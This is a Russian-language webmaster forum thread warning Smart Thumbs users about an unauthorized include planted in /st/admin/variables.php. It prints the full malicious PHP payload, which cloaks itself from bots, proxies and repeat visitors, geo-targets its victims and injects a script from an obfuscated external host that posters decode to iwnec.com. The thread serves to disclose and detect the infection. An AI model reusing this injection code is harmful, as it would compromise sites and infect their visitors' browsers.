Новая тема   Ответить

 S_Flash
Для мамонтов вроде меня, кто ещё юзает Smart Thumbs, советую проверить /st/admin/variables.php на предмет разного рода несанкционированых инклудов. У меня стояли последние версии: 5.83.
Первый клик по тумбе на сайте вставляет вредоносный код. Отлавливается KIS-ом или можно увидеть в хедерах при первом клике по тумбе (смотрите вторую строку в хедерах). Все последующие клики, заходы на сайт уже ничего оне показывают, ловить надо на свежую.

 saaas
Было бы неплохо засветить код что был в variables.php
что бы знать хоть примерно что искать

 S_Flash
Код может отличаться. Тут могу быть разные имена файлов инклуда:
$bookmark_enabled=0;@include_once('/tmp/qcq');

В qcq такое содержание (cразу подготовленное для DTR и SCJ помимо ST):
$qout=($qout)?$qout:'(/out.php|/st/st.php|/scj/cgi/out.php|/dtr/link.php)';
if(!$_COOKIE['qc'] && ((!$_SERVER['HTTP_X_REAL_IP'] && preg_match("%keep-alive%i", $_SERVER['HTTP_CONNECTION'])) || $_SERVER['HTTP_X_REAL_IP']) && $_SERVER['HTTP_USER_AGENT'] && !preg_match("%bot%i",$_SERVER['HTTP_USER_AGENT']) && preg_match("%(msie|chrome|firefox)%i",$_SERVER['HTTP_USER_AGENT']) && $_SERVER['HTTP_ACCEPT_LANGUAGE'] && !$_SERVER['HTTP_X_FORWARDED_FOR'] && !$_SERVER['HTTP_X_FORWARDED'] && !$_SERVER['HTTP_FORWARDED_FOR'] && !$_SERVER['HTTP_FORWARDED'] && !$_SERVER['HTTP_VIA'] && !$_SERVER['HTTP_X_COMING_FROM'] && !$_SERVER['HTTP_COMING_FROM'] && !$_SERVER['HTTP_CLIENT_IP'] && !$_SERVER['HTTP_PROXY_USER'] && !$_SERVER['HTTP_PROXY_CONNECTION'] && (($_SERVER['GEOIP_COUNTRY_CODE'] && preg_match("%(US|CA|AU|GB|DE|DK|FR|SE|CH|NL|IT|BE|AT|ES|NO|IE|FI|NZ)%", $_SERVER['GEOIP_COUNTRY_CODE'])) || ($_SERVER['HTTP_ACCEPT_LANGUAGE'] && preg_match("%(en|de|da|fr|sv|it|es|nl|no|fi)%i", $_SERVER['HTTP_ACCEPT_LANGUAGE'])))){
error_reporting(0);$qd=chr(105).chr(119).chr(110).chr(101).chr(99).chr(46).chr(99).chr(111).chr(109);
if($qi && $_SERVER['HTTP_REFERER'] && !preg_match("%{$_SERVER['HTTP_HOST']}%i", $_SERVER['HTTP_REFERER'])){echo "<script src='http://{$qd}/'></script>";}
elseif (is_array($_COOKIE) && $_SERVER['HTTP_REFERER'] && preg_match("%{$_SERVER['HTTP_HOST']}%i", $_SERVER['HTTP_REFERER']) && preg_match("%$qout%i", $_SERVER['SCRIPT_NAME'])){header("Set-Cookie: qc=1; path=/; expires=". gmdate('D, d-M-Y H:i:s', time()+604800) ." GMT;");echo "<html><body><script>var wo=window.opener.document.createElement('script');wo.src='http://{$qd}/?1';window.opener.document.body.appendChild(wo);window.name='_blanq';window.location.reload();</script><body></html>";exit();}
}
?>

 kort
S_Flash писал:


и смартсж поломали?

 CrazyMen
Каково действие кода? Редиректит куда траф или что-то еще?

 S_Flash


Скорее загружает что-то. Есть разница?
Вот урл, смотри, что он делает
$qd=chr(105).chr(119).chr(110).chr(101).chr(99).chr(46).chr(99).chr(111).chr(109);

 CreativeMotionArt
Както Смарт Тумбс вяло следит и реагирует за своими уязвимостями.

 CreativeMotionArt
Както Смарт Тумбс вяло следит и реагирует за своими уязвимостями.

 fihorn
S_Flash писал:

кто-нибудь изучал вопрос детальнее?

откуда ноги растут у этой дряни? уже который год.

 k1ng
S_Flash писал:


$qd=chr(105).chr(119).chr(110).chr(101).chr(99).chr(46).chr(99).chr(111).chr(109);
Равно
$qd=iwnec.com;